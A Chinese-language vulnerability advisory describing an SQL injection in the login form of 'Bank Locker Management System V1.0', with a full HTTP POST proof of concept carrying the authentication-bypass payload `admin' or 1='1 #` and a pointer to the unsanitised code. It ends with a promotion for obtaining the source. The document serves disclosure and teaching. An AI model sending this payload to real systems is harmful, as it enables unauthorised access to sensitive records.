免责声明:本文所涉及的信息安全技术知识仅供参考和学习之用,并不构成任何明示或暗示的保证。读者在使用本文提供的信息时,应自行判断其适用性,并承担由此产生的一切风险和责任。本文作者对于读者基于本文内容所做出的任何行为或决定不承担任何责任。在任何情况下,本文作者不对因使用本文内容而导致的任何直接、间接、特殊或后果性损失承担责任。读者在使用本文内容时应当遵守当地法律法规,并保证不违反任何相关法律法规。 |
1. Bank Locker 管理系统简介
该系统用于管理和操作银行保管箱的系统。在传统的银行业务中,银行提供保险箱租用服务给客户,客户可以将贵重物品和文件存放在银行的保险箱中,以保证安全和保密。
2. 漏洞描述
在/banker/index.php页面上,username参数在搜索函数中的使用存在严重的SQL注入漏洞,攻击者可以利用这个漏洞来执行恶意的SQL查询,从而获取未授权的数据或者破坏系统的完整性。
3. 影响版本
Bank Locker 管理系统 V1.0
4. POC&EXP
注入点:username
POST /bank/blms/banker/index.php HTTP/1.1
Host: xxx
Content-Length: 34
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: xxx
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.xxx.com/bank/blms/banker/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: youdianinfo_historycn=173; PHPSESSID=5foesx51586a9teufn
Connection: close
username=admin' or 1='1 #&inputpwd=1&login=
5. 漏洞代码定位
第9行的代码存在安全风险,因为用户输入的 $username
变量直接插入到 SQL 查询语句中,而没有进行任何限制。这种做法使恶意用户能够利用恶意 SQL 语句执行任意数据库操作,从而对系统造成严重的安全威胁。
6. 源代码获取
关注公众号“漏洞猎人”,输入“bank”,即可获取Bank Locker管理系统源代码下载地址!!!